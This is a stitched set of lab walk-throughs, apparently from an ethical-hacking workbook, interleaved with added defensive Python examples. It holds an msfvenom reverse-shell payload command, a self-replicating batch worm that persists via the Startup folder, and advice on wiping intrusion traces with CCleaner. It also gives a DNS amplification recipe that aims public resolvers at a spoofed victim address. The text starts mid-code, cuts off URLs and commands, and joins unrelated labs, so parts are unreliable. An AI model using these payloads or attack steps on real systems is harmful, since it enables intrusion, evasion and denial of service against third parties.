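PROBES = ("'", '"', "'-'", "' or '1'='1")


def make_db():
    """Constructed stand-in for DVWA's users table (placeholder hash strings)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER PRIMARY KEY, user TEXT, password TEXT)")
    conn.executemany("INSERT INTO users (user, password) VALUES (?, ?)",
                     [("admin", "<hash-1>"), ("gordonb", "<hash-2>"), ("pablo", "<hash-3>")])
    return conn


def lookup_vulnerable(conn, user_id):
    """DVWA-style: the ?id= value is concatenated into the statement, so the
    quote characters in the wrap-up's probes become part of the SQL."""
    sql = f"SELECT user_id, user FROM users WHERE user_id = '{user_id}'"
    return conn.execute(sql).fetchall()


def lookup_hardened(conn, user_id):
    """Parameterised: the value is bound after parsing and can never alter
    the statement's structure, whatever characters it contains."""
    sql = "SELECT user_id, user FROM users WHERE user_id = ?"
    return conn.execute(sql, (user_id,)).fetchall()


def probe(query_fn, conn, probes=PROBES):
    """Send each probe through `query_fn` and summarise the server's
    reaction, which is exactly the triage the wrap-up describes: a
    database error or an unexpectedly full result set means the input
    reached the SQL parser."""
    outcome = {}
    for value in probes:
        try:
            outcome[value] = f"{len(query_fn(conn, value))} rows"
        except sqlite3.Error as err:
            outcome[value] = f"error: {type(err).__name__}"
    return outcome


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", probe(lookup_vulnerable, db))
    print("hardened:  ", probe(lookup_hardened, db))
```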
Lab Objective:
Learn how to perform Wi-Fi hacking.
Lab Purpose:
Wi-Fi hacking is another useful skill to have,
especially if you are working on-
site/internally. Here we’ll look at techniques
to hack different types of Wi-Fi passwords.
You’ll be needing a wireless adapter that
supports monitor mode for this lab. I have
Alfa AWUS1900, and it works fine. Most, if
not all, Alfa cards should do the trick.
Lab Tool:
Aircrack-ng.
Lab Topology:
You can use Kali Linux in a VM for this lab.
Lab Walk-Through:
Back when I started studying to become an
ethical hacker, every course included WEP
(Wired Equivalent Privacy) hacking.
However, because it’s severely outdated and
practically non-existent in the real world,
which extends to the fact I do not have a
router that supports it, we’re only going to
look at WPA hacking. We’ll be using a suite
called Aircrack-ng, which includes several
tools, and the first of many is going to be:
apt update
apt install aircrack-ng seclists
ifconfig
airmon-ng check kill
airmon-ng start wlan0
Lab Objective:
Learn how to perform sniffing of a wireless
network.
Lab Purpose:
We’ve used Wireshark a couple of times
already in our previous labs, but this time it
will be the main tool we’ll be working with.
There is some neat functionality within it,
and, like Nmap, it should be a staple tool in
every ethical hacker’s toolbelt.
Lab Tool:
Wireshark.
Lab Topology:
You can use Kali Linux in a VM for this lab.
Lab Walk-Through:
We can do this in several ways, for example,
by creating an evil twin wireless AP, or we
can connect to the target network and then
perform ARP or MAC poisoning/flooding.
An evil twin is an AP that has the same
settings as the authentic one, only with a
stronger signal to entice devices to connect to
it rather than the original. The evil twin
would allow us to sniff traffic from all
devices connected to it, while the poisoning
attack will only allow us to sniff traffic from
one specific target. We’ll go the flooding
route as it is easier to set up.
Lab Objective:
Learn about hashes.
Lab Purpose:
In this lab, we’ll look at hashes, what they
are, their purpose and how to identify them.
Lab Tool:
Hash-identifier.
Lab Topology:
You can use Kali Linux in a VM for this lab.
Lab Walk-Through:
We’ve already worked with hashes in our
password cracking labs. At that point in time,
we did not dig deeper into the topic because
the final module of the CEHv11 syllabus covers
cryptography. It’s similar to how we’ve
worked with Wireshark in the past, but the
module before this one is actually concerned
with sniffing.
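Added example, not the hash-identifier tool itself: the same identification by digest length and crypt prefix in Python, plus a confirmation step that hashes a known plaintext with each candidate algorithm so an ambiguous length (MD5 versus NTLM, for instance) can be settled before any cracking time is spent.

```python
import hashlib
import re

# Digest lengths (in hex characters) of common unsalted hashes. Several
# algorithms share a length, so identification by length alone yields
# candidates, which is also all hash-identifier can do.
HEX_CANDIDATES = {
    32: ["MD5", "MD4", "NTLM"],
    40: ["SHA-1", "RIPEMD-160"],
    56: ["SHA-224"],
    64: ["SHA-256", "SHA3-256", "BLAKE2s"],
    96: ["SHA-384"],
    128: ["SHA-512", "SHA3-512", "BLAKE2b", "Whirlpool"],
}

# Modular crypt format prefixes used by /etc/shadow-style password hashes.
CRYPT_PREFIXES = {
    "$1$": "md5crypt", "$2a$": "bcrypt", "$2b$": "bcrypt", "$2y$": "bcrypt",
    "$5$": "sha256crypt", "$6$": "sha512crypt", "$apr1$": "Apache md5crypt",
}

# Candidate name -> hashlib constructor name, for the ones hashlib guarantees.
HASHLIB_NAMES = {
    "MD5": "md5", "SHA-1": "sha1", "SHA-224": "sha224", "SHA-256": "sha256",
    "SHA-384": "sha384", "SHA-512": "sha512", "SHA3-256": "sha3_256",
    "SHA3-512": "sha3_512", "BLAKE2s": "blake2s", "BLAKE2b": "blake2b",
}


def identify_hash(value):
    """Return a list of likely algorithms for `value`, most common first."""
    value = value.strip()
    for prefix, name in CRYPT_PREFIXES.items():
        if value.startswith(prefix):
            return [name]
    if re.fullmatch(r"[0-9a-fA-F]+", value):
        return list(HEX_CANDIDATES.get(len(value), []))
    return []


def verify_candidate(digest, plaintext):
    """Settle the ambiguity: hash `plaintext` with every candidate hashlib
    knows and return the name whose output matches `digest`, else None.
    This is how you confirm a guess before spending cracking time on it."""
    digest = digest.strip().lower()
    for name in identify_hash(digest):
        ctor = HASHLIB_NAMES.get(name)
        if ctor and hashlib.new(ctor, plaintext.encode()).hexdigest() == digest:
            return name
    return None


if __name__ == "__main__":
    # Constructed samples, generated here so the values are certain.
    samples = {
        "md5 of 'password'": hashlib.md5(b"password").hexdigest(),
        "sha256 of 'password'": hashlib.sha256(b"password").hexdigest(),
        "shadow-style": "$6$saltsalt$<constructed-placeholder>",
    }
    for label, h in samples.items():
        print(f"{label:22} {identify_hash(h)}  confirmed as {verify_candidate(h, 'password')}")
```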
Lab Objective:
Learn about various cryptography tools and
how to use them.
Lab Purpose:
In this lab, we’ll look at some cryptography
tools that you can use to encrypt and decrypt
data, or to generate SSH keys, and more.
Lab Tool:
OpenSSL & GnuPG.
Lab Topology:
You can use Kali Linux in a VM for this lab.
Lab Walk-Through:
We’ll cover two tools in this lab, namely
OpenSSL and GnuPG. First, let’s make sure
both are installed on our Kali VMs:
apt update
apt install gnupg openssl
Lab Objective:
Learn how to use VeraCrypt for disk
encryption.
Lab Purpose:
While disk encryption can be achieved with
many other tools as well, VeraCrypt is an
industry favorite.
Lab Tool:
VeraCrypt.
Lab Topology:
You can use Kali Linux in a VM for this lab.
Lab Walk-Through:
To use VeraCrypt, we first have to download
it from this URL:
https://www.veracrypt.fr/en/Downloads.html.
Once it is downloaded, navigate to the
download directory through CLI and run the
following:
dpkg -i veracrypt-1.25.9-Debian-11-amd64.deb
apt install -f
veracrypt --help
Lab Objective:
Learn how to perform monitoring of web
applications for changes.
Lab Purpose:
The final 26 labs will be concerned with more
advanced topics. They are considered
advanced for one or more of the following
reasons: complexity of setup, lack of direct or
full control over the process (such as 3rd party
hosted tools with limited capabilities unless
paid for), specific use cases (i.e., tools and
techniques you will likely not use often).
In the first one of these advanced labs, we
will touch upon the topic of monitoring web
applications for changes.
Lab Tool:
Kali Linux.
Lab Topology:
You can use Kali Linux in a VM for this lab.
Lab Walk-Through:
In this lab, we’ll look at a rather neat thing
we can do as ethical hackers, but sadly it is
limited unless paid for. Still, as your career as
an ethical hacker develops, and thus your
income, you will be able to pay for tools
either out of your own pocket or, if you work
in a company, they will likely be willing to
pay the licenses for you.
Lab Objective:
Learn how to perform email header analysis.
Lab Purpose:
Another interesting technique, but one you
might not be using in every single ethical
hacking engagement (simply due to the fact
that email testing is not always within scope),
is email header analysis.
Lab Tool:
Kali Linux.
Lab Topology:
You can use Kali Linux in a VM for this lab.
Lab Walk-Through:
Analyzing email headers can give us
information such as a detailed log of the
network path taken by the message between
the mail sender and the mail receiver(s)
(email servers). This, in turn, can potentially
show you interesting IP addresses, user
agents (and, by extension, OS information)
and more.
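Added example, not from the book: a Python parser for the Received: chain of a constructed message that recovers the path, IPs, timestamps and client software the text mentions, and notes the anomalies an analyst looks for. All addresses are from the documentation ranges and the domains are reserved names.

```python
import ipaddress
import re
from email import message_from_string
from email.utils import parsedate_to_datetime

# Constructed message. Addresses are from the documentation ranges and the
# domains are reserved names, so nothing here points at a real host.
SAMPLE_EMAIL = """\
Received: from mx1.receiver.test (mx1.receiver.test [198.51.100.10])
\tby inbox.receiver.test with ESMTPS id abc123;
\tMon, 1 Aug 2022 10:00:05 +0000
Received: from smtp.sender.example (unknown [203.0.113.7])
\tby mx1.receiver.test with ESMTP;
\tMon, 1 Aug 2022 10:00:03 +0000
Received: from [10.0.0.5] (host.sender.example [192.0.2.25])
\tby smtp.sender.example with ESMTPSA;
\tMon, 1 Aug 2022 09:59:58 +0000
From: "Alice" <alice@sender.example>
To: bob@receiver.test
Subject: Invoice
User-Agent: Mozilla Thunderbird 91.0
Date: Mon, 1 Aug 2022 09:59:57 +0000

Please see attached.
"""

RECEIVED_RE = re.compile(r"from\s+(?P<helo>\S+)\s*(?:\((?P<rdns>[^)]*)\))?\s+by\s+(?P<by>\S+)")
IP_RE = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")


def received_chain(raw):
    """Parse the Received: headers into hops, oldest first.

    Each mail server prepends its own Received line, so the top header is
    the last hop and the bottom one is where the message entered the mail
    system. Each hop records the HELO name the client gave, the reverse DNS
    name and IP the server saw, the receiving server, and its timestamp.
    """
    msg = message_from_string(raw)
    hops = []
    for value in reversed(msg.get_all("Received", [])):
        value = " ".join(value.split())                 # unfold continuation lines
        m = RECEIVED_RE.search(value)
        if not m:
            continue
        rdns = m.group("rdns") or ""
        ip = IP_RE.search(rdns)
        stamp = value.rsplit(";", 1)[1].strip() if ";" in value else None
        hops.append({
            "helo": m.group("helo"),
            "rdns": rdns.split()[0] if rdns else None,
            "ip": ip.group(1) if ip else None,
            "by": m.group("by"),
            "time": parsedate_to_datetime(stamp) if stamp else None,
        })
    return hops


def analyze_headers(raw):
    """Return (hops, notes): the path plus the observations an analyst makes
    from it. Notes cover a hop with no reverse DNS (a classic sign of a
    sender that is not a proper mail server), a private originating
    address, and timestamps that run backwards between hops."""
    hops = received_chain(raw)
    notes = []
    if hops and hops[0]["helo"].startswith("["):
        addr = ipaddress.ip_address(hops[0]["helo"].strip("[]"))
        if addr.is_private:
            notes.append(f"originating client {addr} is a private address (internal submission)")
    for i, hop in enumerate(hops):
        if hop["rdns"] == "unknown":
            notes.append(f"no reverse DNS for {hop['ip']} at hop {i + 1} (received by {hop['by']})")
        if i and hop["time"] and hops[i - 1]["time"] and hop["time"] < hops[i - 1]["time"]:
            notes.append(f"hop {i + 1} timestamp precedes hop {i}: clock skew or forged header")
    return hops, notes


def client_software(raw):
    """The mail client's self-description, which also hints at the OS."""
    msg = message_from_string(raw)
    return msg.get("User-Agent") or msg.get("X-Mailer")


if __name__ == "__main__":
    hops, notes = analyze_headers(SAMPLE_EMAIL)
    for i, hop in enumerate(hops, 1):
        print(f"hop {i}: {hop['ip']} ({hop['rdns']}, HELO {hop['helo']}) -> {hop['by']} at {hop['time']}")
    print("notes:", notes)
    print("client:", client_software(SAMPLE_EMAIL))
```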
Lab Objective:
Learn how to perform DLL hijacking.
Lab Purpose:
DLL hijacking is a post-exploitation
technique that requires understanding of how
native applications run on Windows OSs.
Lab Tool:
Kali Linux.
Lab Topology:
You can use Kali Linux and Windows 7 in a
VM for this lab.
Lab Walk-Through:
DLLs (Dynamic Link Libraries) allow
programs/applications running on Windows
OSs to share code, which allows for more
modular applications. DLLs contain functions
within themselves that applications can “call”
and use for their own operations. These DLLs
can belong to the OS or the application itself,
in which case they ship with the application.
http://support.kaspersky.com/downloads/utils/kavremov
https://web.archive.org/web/20170804213208/https://do
Lab Objective:
Learn about rootkits.
Lab Purpose:
The term rootkit can be used to denote a
malware that hides itself upon activation or a
tool that allows us to hide previously used
malware. Either way, the point lies in the fact
that the malware becomes hidden from
system users.
Lab Tool:
bytecode77.
Lab Topology:
You can use Kali Linux and Windows 7 in a
VM for this lab.
Lab Walk-Through:
The first thing we’re going to do is create a
basic malware using MSFVenom with the
command:
msfvenom -p windows/x64/meterpreter/reverse_tcp -f exe -a x64 --platform windows LHOST=192.168.77.128 LPORT=1234 -o meterpreter.exe
Lab Objective:
Learn how to utilize alternate data streams.
Lab Purpose:
Alternate data streams (ADS) are essentially
secret file “attributes” or streams of data
attached to a preexisting file. This feature
exists on NTFS file systems, hence the title of
this lab. Each file can have multiple data
streams, in which you can place text or even
other files. This is perfect for us as ethical
hackers because we should always aim to be
as stealthy as possible.
Lab Tool:
SysInternals.
Lab Topology:
You can use Windows 7 in a VM for this lab.
Lab Walk-Through:
To elaborate a bit more on the topic, each file
within the NTFS file system has several
attributes, one of which is $Data. These are
hidden from plain sight and, as stated in the
Lab Purpose, a single file can have multiple
$Data attributes attached to it. Not only is this
attribute hidden from users, but it also does
not show up as occupied file space. In other
words, if you attach a 12GB file as an
alternate data stream to a 20MB base file, the
occupied space on that disk will seem to be
only 20MB.
Lab Objective:
Learn how to use Auditpol.
Lab Purpose:
Auditpol is a tool native to Windows Server
2008, Windows Vista and newer OSs. Its
main purpose is auditing policies, as the name
implies, and we will use it for information
gathering.
Lab Tool:
Auditpol.
Lab Topology:
You can use Windows 7 in a VM for this lab.
Lab Walk-Through:
Auditpol cannot be run remotely, so we either
need to achieve a system compromise and get
shell access or, for demonstration purposes,
we can just head over to our Windows 7 VM.
Before we do anything else, head over to Start
→ Local Security Policy → Local Policies →
Security Options → Audit: Force audit policy
subcategory settings (Windows Vista or later)
to override audit policy category settings →
Local Security Settings → Enabled.
Lab Objective:
Learn how to clear your tracks using
Windows native tools.
Lab Purpose:
While this lab might not seem like anything
advanced, we feel the need to include it as
well because quite a lot of people are familiar
with the app in question and have likely used
it in the past to “clean up” their computer.
Needless to say, that same cleaning up can
actually remove evidence of our activity on a
target machine.
Lab Tool:
CCleaner.
Lab Topology:
You can use Windows 7 in a VM for this lab.
Lab Walk-Through:
First, we have to download the tool from this
URL:
https://www.ccleaner.com/ccleaner/download/standard
onto our Windows VM, then install and run
it. Now, when we want to clear our ethical
hacking tracks, we do not want to leave the
target system devoid of any and all logs
and/or activity traces, as that would also
raise suspicion. Imagine the system in
question was actively used by someone who
browsed some websites; we do not want to
delete their history, only what we did, so
always be mindful of that.
Lab Objective:
Learn how to create a worm malware.
Lab Purpose:
As stated in our labs on malware, the main
difference between worms and viruses is that
worms can propagate on their own. The
reason we’ve placed this lab much later than
all the others pertaining to malware is
because it assumes some programming
knowledge on your part.
Lab Tool:
Windows 7 VM.
Lab Topology:
You can use Windows 7 in a VM for this lab.
Lab Walk-Through:
Create a file called Crack.txt on your
Windows box with the following contents:
@ECHO OFF
XCOPY "Crack.bat" "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup"
:x
MD Crack
CD Crack
XCOPY "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\Crack.bat"
CD Crack
GOTO x
Once done, rename the file to Crack.bat and
run it. Immediately you will see the
Windows CLI pop up and a ton of messages
being printed out. Stop the worm by closing
the CLI window, and let's see what the
damage is.
If you noticed, there is a new directory called
Crack and, if we navigate through it, we can
see that the script copied itself numerous
times, along with the newly created directory.
Needless to say, if we improve our worm, it
can easily take up system resources, and it
does that quite fast and completely on its
own, save for us needing to start it.
Lab Objective:
Learn how to perform switch port stealing.
Lab Purpose:
Switch port stealing is another type of MITM
attack and, as the name implies, requires you
to have a switch that you can attack. Modern
home routers oftentimes act as switches, but
that is not necessarily always the case, so this
attack will be dependent on the hardware you
have access to.
Lab Tool:
ARPing.
Lab Topology:
You can use Kali Linux, Metasploitable and
OWASP BWA in a VM for this lab.
Lab Walk-Through:
Port stealing, similar to other MITM attacks,
targets a specific component of switched
LANs, the Content Addressable Memory
(CAM) table. This table stores information on
which MAC address is connected to which
port on the switch. Because of this table, the
switch knows that, for example, a device with
the MAC address 02:42:a0:75:76:19 is on the
switch's physical port 1, the NIC with the
MAC address 00:50:56:3a:6c:9c is on port
2, etc., allowing for smart transfer of data
between devices. It may seem similar to an
ARP table, but remember that ARP is what
connects MAC addresses to IP addresses. The
attack itself, though, is similar in principle,
as we will see now.
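The CAM table is also where port stealing leaves its mark: the switch keeps relearning the same MAC address on two different ports in quick succession, which is why managed switches offer MAC-move notifications and port security. The following Python block is an added example, not part of the book, that models a learning table over a constructed frame log (the two MAC addresses are the ones quoted above) and raises an alert when one address changes port three times within five seconds; the thresholds are assumptions chosen for illustration.

```python
from collections import defaultdict, deque

# Constructed frame log for illustration (timestamp in seconds, ingress port, source MAC).
# The two MAC addresses are the ones the lab text uses as examples. Host A lives on
# port 1 and host B on port 2; from t=10 frames carrying A's MAC start arriving on
# port 2 as well, which is what a switch sees while A's CAM entry is being stolen.
SAMPLE_FRAMES = [
    (0.0, 1, "02:42:a0:75:76:19"),
    (0.5, 2, "00:50:56:3a:6c:9c"),
    (1.0, 1, "02:42:a0:75:76:19"),
    (10.0, 2, "02:42:a0:75:76:19"),
    (10.2, 1, "02:42:a0:75:76:19"),
    (10.4, 2, "02:42:a0:75:76:19"),
    (10.6, 1, "02:42:a0:75:76:19"),
    (10.8, 2, "02:42:a0:75:76:19"),
]


class CamTable:
    """Minimal model of a switch's MAC learning table with MAC-move monitoring."""

    def __init__(self, window=5.0, max_moves=3):
        self.table = {}                   # mac -> (port, last_seen)
        self.moves = defaultdict(deque)   # mac -> timestamps of recent port changes
        self.window = window              # seconds over which moves are counted (assumed)
        self.max_moves = max_moves        # moves within the window that raise an alert (assumed)
        self.alerts = []                  # (timestamp, mac, old_port, new_port)

    def learn(self, ts, port, mac):
        prev = self.table.get(mac)
        if prev is not None and prev[0] != port:
            recent = self.moves[mac]
            recent.append(ts)
            while recent and ts - recent[0] > self.window:
                recent.popleft()          # forget moves older than the window
            if len(recent) >= self.max_moves:
                self.alerts.append((ts, mac, prev[0], port))
        self.table[mac] = (port, ts)      # a real switch relearns the port just like this


def analyse(frames, window=5.0, max_moves=3):
    """Replay a frame log through the model and return it with table and alerts filled."""
    cam = CamTable(window, max_moves)
    for ts, port, mac in frames:
        cam.learn(ts, port, mac)
    return cam


if __name__ == "__main__":
    for alert in analyse(SAMPLE_FRAMES).alerts:
        print("MAC move storm at t=%.1f: %s flapped from port %d to port %d" % alert)
```

A legitimate host that is unplugged and moved to another port produces a single move, so the rate threshold is what separates normal operation from an address being fought over.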
Lab Objective:
Learn how to perform IRDP spoofing.
Lab Purpose:
IRDP stands for ICMP Router Discovery
Protocol and is a routing protocol that allows
hosts to discover the IP addresses of active
routers on their subnet. This means that, if
successful, we can pretend to be the router. It
is very similar to ARP poisoning, only using
a different protocol.
Lab Tool:
Irpas.
Lab Topology:
You can use Kali Linux and Windows 7 in a
VM for this lab.
Lab Walk-Through:
Since Irpas is not installed on our Kali box,
we ought to do so with the commands:
apt update
apt install irpas -y
Lab Objective:
Learn how to perform TCP/IP hijacking.
Lab Purpose:
TCP/IP hijacking is a type of session
hijacking but differs from what we’ve seen
before in that we’re not compromising a web
session but rather a TCP connection’s
session. Think of a user logging into a Telnet
service on another machine. They, if Telnet is
properly configured, should supply their
credentials before gaining access to the
service. It is these types of sessions that
TCP/IP hijacking aims to compromise.
Lab Tool:
Shijack.
Lab Topology:
You can use Kali Linux, Metasploitable and
OWASP BWA in a VM for this lab.
Lab Walk-Through:
We need three machines for this lab: one to
attack from (Kali), one that has a Telnet
server (Metasploitable) and one to make the
Telnet connection from, i.e. the Telnet client
(OWASP BWA). The tool we'll be using can
be downloaded from the following URL:
https://packetstormsecurity.com/sniffers/shijack.tgz
Lab Objective:
Learn how to perform IP spoofing.
Lab Purpose:
The idea behind IP spoofing is to make a
target (server) think the packets it is receiving
are coming from another client when in fact,
they are coming from us, the attacker. This is
beneficial when the target performs
differently depending on who is interacting
with it, based on the source IP address.
Lab Tool:
Hping3.
Lab Topology:
You can use Kali Linux, Metasploitable and
Windows 7 in a VM for this lab.
Lab Walk-Through:
IP spoofing is a technique that relies on our
target accepting source routed packets.
Source routing is a specific routing process
where senders can specify the route that data
packets take through a network. To that end,
we need to discover which IP address is
trusted on the target. Since this is a lab that
we have full control over, we can safely
“assume” that Windows 7 is trusted by
Metasploitable.
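Source routing is carried in the IPv4 options field, which is where the check for it has to happen. The added Python example below (not from the book) builds a constructed IPv4 header with and without a Loose Source and Record Route option and shows the parsing that lets a host or packet filter recognise such packets and drop them, which is what most operating systems do by default; the addresses are the lab's own and the helper names are assumptions.

```python
import ipaddress
import struct

# IPv4 option type codes for source routing (RFC 791).
LSRR = 131   # Loose Source and Record Route
SSRR = 137   # Strict Source and Record Route


def parse_ipv4_options(packet: bytes):
    """Return [(type, payload)] for every option in the IPv4 header of `packet`."""
    if len(packet) < 20:
        raise ValueError("short packet")
    ver_ihl = packet[0]
    if ver_ihl >> 4 != 4:
        raise ValueError("not IPv4")
    ihl = (ver_ihl & 0x0F) * 4
    if ihl < 20 or ihl > len(packet):
        raise ValueError("bad IHL")
    opts = packet[20:ihl]
    found, i = [], 0
    while i < len(opts):
        kind = opts[i]
        if kind == 0:            # End of Option List
            break
        if kind == 1:            # No Operation: single byte, no length field
            i += 1
            continue
        if i + 1 >= len(opts):
            raise ValueError("truncated option")
        length = opts[i + 1]
        if length < 2 or i + length > len(opts):
            raise ValueError("bad option length")
        found.append((kind, opts[i + 2:i + length]))
        i += length
    return found


def source_route(packet: bytes):
    """Return ('LSRR'|'SSRR', [hop, ...]) if the packet is source routed, else None."""
    for kind, payload in parse_ipv4_options(packet):
        if kind in (LSRR, SSRR):
            addrs = payload[1:]      # payload[0] is the route pointer
            hops = [str(ipaddress.IPv4Address(addrs[j:j + 4]))
                    for j in range(0, len(addrs) - len(addrs) % 4, 4)]
            return ("LSRR" if kind == LSRR else "SSRR", hops)
    return None


def build_ipv4_header(src: str, dst: str, options: bytes = b"") -> bytes:
    """Constructed IPv4 header (TTL 64, protocol TCP, checksum left at zero)."""
    options += b"\x00" * ((-len(options)) % 4)     # pad to a 32-bit boundary
    ihl = 5 + len(options) // 4
    fixed = struct.pack("!BBHHHBBH4s4s", (4 << 4) | ihl, 0, ihl * 4, 0, 0, 64, 6, 0,
                        ipaddress.IPv4Address(src).packed, ipaddress.IPv4Address(dst).packed)
    return fixed + options


def source_route_option(hops, strict=False) -> bytes:
    """Encode a source-route option: type, length, pointer (4 = first hop), then hops."""
    body = b"".join(ipaddress.IPv4Address(h).packed for h in hops)
    return bytes([SSRR if strict else LSRR, 3 + len(body), 4]) + body


# Constructed packets: a plain one and one asking to be routed via the Kali box.
PLAIN = build_ipv4_header("192.168.77.155", "192.168.77.139")
ROUTED = build_ipv4_header("192.168.77.155", "192.168.77.139",
                           source_route_option(["192.168.77.128"]))

if __name__ == "__main__":
    for name, pkt in (("plain", PLAIN), ("routed", ROUTED)):
        print(name, "->", "drop: " + str(source_route(pkt)) if source_route(pkt) else "accept")
```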
Lab Objective:
Learn how to perform an RST attack.
Lab Purpose:
The RST attack is a type of DoS attack as it
resets the connection between two target
machines, a client and a server, for example.
This lab demonstrates exactly what we can do
when we absolutely must break an already
existing connection between such machines.
Lab Tool:
Hping3.
Lab Topology:
You can use Kali Linux and Metasploitable
in a VM for this lab.
Lab Walk-Through:
As in the previous lab, we’ve identified the IP
addresses of all machines and have now
started Wireshark and established an SSH
connection from Kali to Metasploitable.
Then, on Wireshark, we want to filter only
those packets which go to and from our two
machines and look at the very last one.
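The RST attack above relies on how the receiver validates the reset: under the original TCP specification any RST whose sequence number falls inside the receive window aborts the connection. The following added Python example (not from the book) contrasts that rule with the RFC 5961 check implemented by modern stacks, where only an RST carrying exactly RCV.NXT tears the connection down and an in-window but inexact one earns a challenge ACK instead; the window and sequence values are constructed.

```python
# TCP sequence numbers are 32-bit and wrap, so every comparison is done modulo 2**32.
SEQ_MOD = 1 << 32


def in_window(seq, rcv_nxt, rcv_wnd):
    """True if seq lies in [rcv_nxt, rcv_nxt + rcv_wnd), allowing for wrap-around."""
    return (seq - rcv_nxt) % SEQ_MOD < rcv_wnd


def rst_action_rfc793(seq, rcv_nxt, rcv_wnd):
    """Original rule: any in-window RST aborts the connection."""
    return "reset" if in_window(seq, rcv_nxt, rcv_wnd) else "drop"


def rst_action_rfc5961(seq, rcv_nxt, rcv_wnd):
    """RFC 5961 rule: only an RST with SEG.SEQ == RCV.NXT aborts; an in-window but
    inexact RST is answered with a challenge ACK, which an off-path sender never sees."""
    if not in_window(seq, rcv_nxt, rcv_wnd):
        return "drop"
    if seq == rcv_nxt:
        return "reset"
    return "challenge-ack"


def blind_rst_guesses(rcv_wnd, rfc5961=True):
    """Sequence numbers an off-path sender would have to cover to satisfy the check:
    one per window under RFC 793, every single value under RFC 5961."""
    return SEQ_MOD if rfc5961 else -(-SEQ_MOD // rcv_wnd)


def classify(rcv_nxt, rcv_wnd, rst_seqs):
    """Classify a batch of incoming RST sequence numbers under both rules."""
    return [(seq, rst_action_rfc793(seq, rcv_nxt, rcv_wnd),
             rst_action_rfc5961(seq, rcv_nxt, rcv_wnd)) for seq in rst_seqs]


if __name__ == "__main__":
    # Constructed connection state: next expected byte 1,000,000 with a 64 KiB window.
    for row in classify(1_000_000, 65_535, [1_000_000, 1_030_000, 2_000_000]):
        print("seq=%d  rfc793=%s  rfc5961=%s" % row)
    print("guesses: rfc793=%d rfc5961=%d" % (blind_rst_guesses(65_535, False), blind_rst_guesses(65_535)))
```

The Wireshark view of the lab shows the same thing from the other side: the reset only lands because the injected segment's sequence number matches what the receiver expects.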
Lab Objective:
Learn how to perform UDP hijacking.
Lab Purpose:
UDP hijacking is very similar to TCP
hijacking, with the added simplicity of UDP
being stateless and not carrying sequence
numbers. This does not diminish its
usefulness, as we can abuse UDP to gain
control over DNS or NTP communication
between a client and a server.
Lab Tool:
Scapy.
Lab Topology:
You can use Kali Linux, Windows 7 and
Metasploitable in a VM for this lab.
Lab Walk-Through:
You might wonder what good it would do us
to gain control over DNS or NTP
communication. Well, the former can be used
as an alternative to DNS spoofing, and the
latter could, for instance, be used to “expire”
an HSTS post (if time is moved forward) or
make an expired certificate valid (if time is
moved backward). So, let's see how we'd go
about it. First, we want to start a UDP
communication between two machines.
These can be any two from our lab VM
environment, and I'll pick Windows to serve
as the client and Metasploitable to serve as
the server. First, we need to transfer Netcat
onto Windows with the command:
scp /usr/share/windows-resources/binaries/nc.exe IEUser@192.168.77.155:/cygdrive/c/Users/Public/Documents
After that, we start the UDP communication
with:
nc -lvnup 7777
on Metasploitable and:
nc -u 192.168.77.139 7777
Lab Objective:
Learn how to use Websploit.
Lab Purpose:
Websploit is a toolkit containing various
functionality, such as MITM attacks, Wi-Fi
attacks, and more.
Lab Tool:
Websploit.
Lab Topology:
You can use Kali Linux and Windows 7 in a
VM for this lab.
Lab Walk-Through:
This time we'll start things off immediately
with a sequence of commands that go from
installing the tool to running one of its attacks:
apt update
apt install websploit
websploit
help
show
Lab Objective:
Learn how to utilize packet crafting tools.
Lab Purpose:
In this lab, we'll look at a packet crafting
tool. Akin to Hping3, the tool we'll show here
allows us to craft nearly any packet
imaginable, but there are more steps involved
to make the tool run, so we've left it for the
end of our 101 Labs.
Lab Tool:
PackETH.
Lab Topology:
You can use Kali Linux in a VM for this lab.
Lab Walk-Through:
First, we need to download the tool by
typing:
git clone https://github.com/jemcek/packETH
cd packETH
apt update
apt install autoconf automake libgtk2.0-dev build-essential gtk2.0 -y
./autogen.sh
./configure
make
./packETH
Lab Objective:
Learn how to perform DNS server hijacking.
Lab Purpose:
We’ve looked at DNS cache poisoning in one
of our previous labs. This time we’ll look at a
different kind of attack targeting the same
service, DNS.
Lab Tool:
DNSChef.
Lab Topology:
You can use Kali Linux and Windows 7 in a
VM for this lab.
Lab Walk-Through:
An important thing to mention is that this lab
requires that we have compromised either the
DNS server that we know our target looks up
for nameserver resolution or the target's own
DNS server lookup/priority settings... or
both! So, we'll postulate that we have
achieved such a thing by in fact doing the
necessary setup on our Windows box. First,
click the Start button and then search for
Network and Sharing Center, select your
main network connection, right-click on it and
choose Properties, then find Internet Protocol
Version 4 (TCP/IPv4), again click on
Properties and input your Kali's IP address
into the Use the following DNS server
addresses field, like in the screenshot below:
Once that’s taken care of, we can proceed to
devise our attack on Kali with the following
commands:
apt update
apt install dnschef
dnschef --fakeip=192.168.77.128 --fakedomains=kali.org --interface=0.0.0.0
service apache2 start
wireshark
Make sure you have an index.html file in the
/var/www/html directory with some unique
content. Then, from Windows, navigate to
kali.org. Immediately you will see DNSChef
doing its thing, and the Windows machine
gets redirected to your Kali’s Apache
webserver. In Wireshark, we can see the DNS
“conversation” between Windows and Kali.
You will find this attack much less noisy than
DNS cache poisoning but, as we stated at the
start of the lab, there are some prerequisites
that you might not always be able to meet.
Lab Objective:
Learn how to perform a DNS amplification
attack.
Lab Purpose:
A DNS amplification attack is a type of DoS
attack using DNS packets to overwhelm the
target. This can further be increased by
running the script we will show in this lab
from multiple machines, effectively
performing a DDoS attack.
Lab Tool:
DNSDrDoS.
Lab Topology:
You can use Kali Linux and Windows 7 in a
VM for this lab.
Lab Walk-Through:
There is a script we have to download from
this URL:
https://raw.githubusercontent.com/nullsecuritynet/tools/ma
and compile it on our Kali machine. We can
achieve this with the following commands:
wget https://raw.githubusercontent.com/nullsecuritynet/tools/master/dos/dnsdrdo
gcc dnsdrdos.c -o dnsdrdos.o -Wall -ansi
echo '8.8.8.8\n8.8.4.4\n9.9.9.9\n149.112.112.112\n208.67.222.222\n208.67.220
wireshark
./dnsdrdos.o -f DNSlist.txt -s 192.168.77.155 -l 1000000
After running the script for only a handful of
seconds, we can see in Wireshark that we
were able to generate over 200000 packets.
This is likely to overwhelm home devices,
and a DDoS attack like this can even
overwhelm some home servers. What’s great
about this is that we’ve hidden ourselves
